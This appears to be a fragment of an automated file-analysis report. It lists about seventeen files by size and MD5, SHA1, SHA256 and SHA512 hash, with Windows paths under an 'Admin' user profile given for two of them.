Filesize
38B
MD57feb1957964f0e8cb7ab131e16f601bc
SHA1803b742101dbd4ea28cc4d2919c8d10c948665bd
SHA2562e72a4c2c435d51a51fa2383d6c9d95c8cb00533f426a728caf12512b114ca02
SHA512dd215d69a7ede34e4517665e7a7ec2661e3af4632a2292ffe941d96a1bcb34406316b793256fc2aa0b042e8fa258b1d1a85497f8c337327dcd17db10b438f988
-
Filesize
170B
MD5fcc223169ce803a4f80884ad7d678d93
SHA1be41298352055e661ccf7361bb27594cc7f41e02
SHA2560d4b7af2582d9e4757fb6aca5d3d79b8f4341fd6d87bdec60a27889a8932a875
SHA512fc6c78b8e2cbe8201076e27368e649b003d347ddc3fc72c2405e3b980da3ddf6a36b7ea9dee6ee324e89a5c3568271e6e8bdd0c17bbb29d60c3d84078f1b8ccb
-
Filesize
4KB
MD54d6524cc60d4e6a779efa25d9b40aabe
SHA10aca626e19000d36e8831f5461ad09b90301878d
SHA256d8840438799af4dcfd7a8f29f513365277ff5ee63a4c703e057d37c1fb466fce
SHA512dc3b960ef0ac1f24374af2385870e4d22692723b004e57fd1b72c96eac10520d0e518ca1993c1c9a6dd6479c1c21c74856879a226448d7889c7c663e5dec82d4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx
Filesize4.0MB
MD5d572f3c193cbfc88c4f3779657b8e20d
SHA1db07b42317293f2e331c4f34a34fc44abb4c9793
SHA2565e9b4e081abe7439af6fe53489108d8de3d0c9dbc297f080a1cf17e4913fdfd5
SHA512cae95d69f65b13de18908d57186a7fd9c74762152a3e0a51f5031ff029231cffdaf40e69b07c5ecbf812cd8f7c6d2c425abba35ad8fe4567e66a6df949751564
-
Filesize
20KB
MD5769b5f57e23477252ee0cbd8dd16e94c
SHA123dbd7daccf4390d014749fcf5d0cc9d0258f009
SHA2560940c32503c6d796f115b945b912ead4f528898a100a91ec74b882e458ac02a4
SHA5126cbc7f0b89f0c71adef388c301040ea4806f0c1cddd106d65f25fc7ee3d4bb73ffbe407f210a09425fc4f3f38a48d7bd478bd8eb8e7d0b5edef9b2928c2d223c
-
Filesize
476B
MD51d2dc16cea62fa0db08f9897e7a04cc4
SHA11e65f8e9a1b82586a87a6548dc833c1b69e406c4
SHA25625158989109bac77548e7726be3a427bf816f4650f3948839fcdd41b26c1b9df
SHA5123f26c180a895997e161b5db9cc17382d23436c27705a4accc72da4ec1a4d28f04fc4d0c304e69380b95b091b77ec4993a60b5eed57d84604ad21a480fd4a860f
-
Filesize
1007B
MD563dba90d47200e3b6b6b790d42acd21b
SHA1aec0e4644d79789213c698f3aba1134b8105367c
SHA2564c55ac116bc3afa529fda75e19eec9ea3696f37d26badfcf96b24c3931c59e31
SHA51237b3a125391f57df5291918d485ddc7d5a5a758a4e0b1ee7a742edfb060af49dc35f22245f3bc6edfd30e18f459066daf57b61e95f6a93fef26f794d1ee1344d
-
Filesize
122B
MD5525cb996edffa565d7386b350f358937
SHA177da62141ed3c5a23b2fc65dfb13c2bab6636f87
SHA256f0828a76ccfde5d890359810139cb9acb583d66299d6a998554ea63a423ad677
SHA512f72ab9527b732d77a3fb7ea5b521ecbe9be1ba6bbbb0cacdce2a49655e091371c99b057189ee84385f017bfc167612d56ddf882871de9d65bb166f77723ba7d4
-
Filesize
16B
MD5cfdae8214d34112dbee6587664059558
SHA1f649f45d08c46572a9a50476478ddaef7e964353
SHA25633088cb514406f31e3d96a92c03294121ee9f24e176f7062625c2b36bee7a325
SHA512c260f2c223ecbf233051ac1d6a1548ad188a2777085e9d43b02da41b291ff258e4c506f99636150847aa24918c7bbb703652fef2fe55b3f50f85b5bd8dd5f6e3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5027853b0f473e3d03f16e0e8ec5201bf
SHA1de48752177223873751c4ce877a86213641a2a57
SHA256fd81a6b3dd11147ba0bcff2ac4214745cf15a19946c7c9f8e0c56e1af7df0dae
SHA512201d35f9fa656b1fa4d866e797dd4ef39bcb243ba17c36a86a115daccda35281853ded9fa01d29766fe44959561cc4a8bca5664bdcbbdf2937a9e09215c19e2a
-
Filesize
256B
MD5c7977c4a27597b04139e5070e80332ad
SHA18ccc589fcaf897c30b9a116c2a5147affcaedccf
SHA256fbff74a38cc91aa42a520a4ab6631995822e8b0d6e84b2ec33d2448093b32e21
SHA512f851bf0dd017f7b47fa530f24c2d782c50303adc12b9a836bad356523192a77cdf3c8762835297190b97088e2a7ac3388ff7ca1c26e6b96776ec6408c982df0f
-
Filesize
400B
MD5ac19ccd5e9e68c3eb56db0e9e13bc4b2
SHA196e8613a918919e99ff6641c24945002f8dbe4b4
SHA256f9be0f6bb237ed35d01bd3354f4848804522691ddb7cfc403024fb4ced030410
SHA512ec11c0acaf1b9bfa4928fd265e284c86a18caa6ba8090f67ea885fec234ce02c94da7b193b61f0a86f40a9c69c903e6fa911c9986560d3492a94b23be64d6782
-
Filesize
416B
MD52e352a6628f5576b5242ca21a94df75b
SHA1e4fcbb6e5a8074f26447f010d62303ef4dd0d6be
SHA25693f7f4e475d28cf74c0e3bd53ca1bf6344c8e360dd521034d629dbc11b50525b
SHA51234d744ff7447e4bcdaab34350cc94fa7fc731c74420b7217c423c107067ba8840cf38a45e9bfc9caf528038bf8d08d65da7dd764dd00dd8d1f485a70c3e7351c
-
Filesize
863KB
MD59fb14d31e80a96f0054a324b0971b229
SHA1681a2de46c1859248539d8c5d19e8f1435c13b32
SHA256eaf46bc9bee18096d1236053b7d41279b3b74c7c19d63200daccfdcbaf17b796
SHA512b5638ee712ce077c6324659205534d45f2ce81b13be1b9421cd65d311bd5d84e0fca0fab826a51ba3e2e58c53d9291aacb2bb9061acf7701079e6e536e234add
-
Filesize
960KB
MD54a7712b5db89e575ecf3c49846af5553
SHA10bd8bbe0e7d3c85ca1ffb204bfe3af22d3740955
SHA256cc7c7882b248ba1a75f6103869d63505a339daabcad5400372c2c319db4ec71b
SHA51205db79364f7a4e1b96a90ebca20d0aab0b8a16bcdd5274bb8fd9d9574f5189dae053580c5185884c0cfae4cfd77306c7734ea3cc578417dd97e2668383420d20
-
Filesize
6.0MB
MD5ca710591543797b655a51b04585e2d58
SHA1d1fb89147c58cb9f73f2e827fd4e6d41940076df
SHA256ec9d392b8a8705a0a510a47e1a4ee3b8785dc87bb2b89b5d6c5eee81e92c11f2
SHA512115ff641cb3b0888c3075decb603003a651dbb04bce79e4be6d4cad09ad4fe03cca9c7327e26a48a7fd8ed42e0fba2c283bc925d4e50635d3a0a0c6c727146c0
-
Filesize
912KB
MD5e78afab1c48e3db4f6eeac83c5d7491f
SHA1d117e6198ac31a750f9cdc01e78763e73186d65c
SHA256854b311a73b55e36ea916da96cc497045c2767e532897cbee77c3bc0ed809b07
SHA5124f330db371284a99ace35f6e3f8d30c1657269113d8778110c7316ad91d045109cc16d925073c31839cdafe9a8f8d50ef9a638182fec08ce223b3cf9c5b20cbb